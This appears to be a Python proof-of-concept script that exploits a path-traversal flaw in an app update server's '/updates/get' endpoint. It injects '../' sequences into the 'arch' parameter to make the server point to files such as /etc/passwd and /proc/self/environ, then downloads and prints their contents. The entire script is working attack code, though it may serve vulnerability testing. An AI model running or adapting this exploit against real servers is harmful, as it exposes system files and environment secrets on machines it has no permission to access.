40 lines
1.2 KiB
Python
40 lines
1.2 KiB
Python
import sys
|
|
import json
|
|
from urllib.request import urlopen
|
|
from urllib.parse import urlencode
|
|
from urllib.error import URLError
|
|
|
|
u = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8080"
|
|
u = u.rstrip("/")
|
|
t = ["etc/hostname", "etc/passwd", "proc/1/cmdline", "proc/self/environ", "proc/cpuinfo"]
|
|
|
|
for d in range(1, 11):
|
|
up = "/".join([".."] * d)
|
|
for f in t:
|
|
a = f"{up}/{f}"
|
|
params = urlencode({
|
|
"platform": "android",
|
|
"arch": a,
|
|
"app": "1.0.0",
|
|
"kernel": "0.0.0"
|
|
})
|
|
try:
|
|
r = urlopen(f"{u}/updates/get?{params}", timeout=5)
|
|
data = json.loads(r.read())
|
|
except (URLError, ValueError):
|
|
continue
|
|
|
|
k = data.get("kernelUpdateRequired") or data.get("kernel_update_required")
|
|
kurl = data.get("kernelUrl") or data.get("kernel_url")
|
|
if k and kurl and ".." in kurl:
|
|
print(f"Found: {kurl}")
|
|
try:
|
|
c = urlopen(u + kurl, timeout=5).read().decode("utf-8", errors="replace")
|
|
print(c[:1000])
|
|
except URLError:
|
|
print("Download failed")
|
|
sys.exit(0)
|
|
|
|
print("Not vulnerable")
|
|
sys.exit(1)
|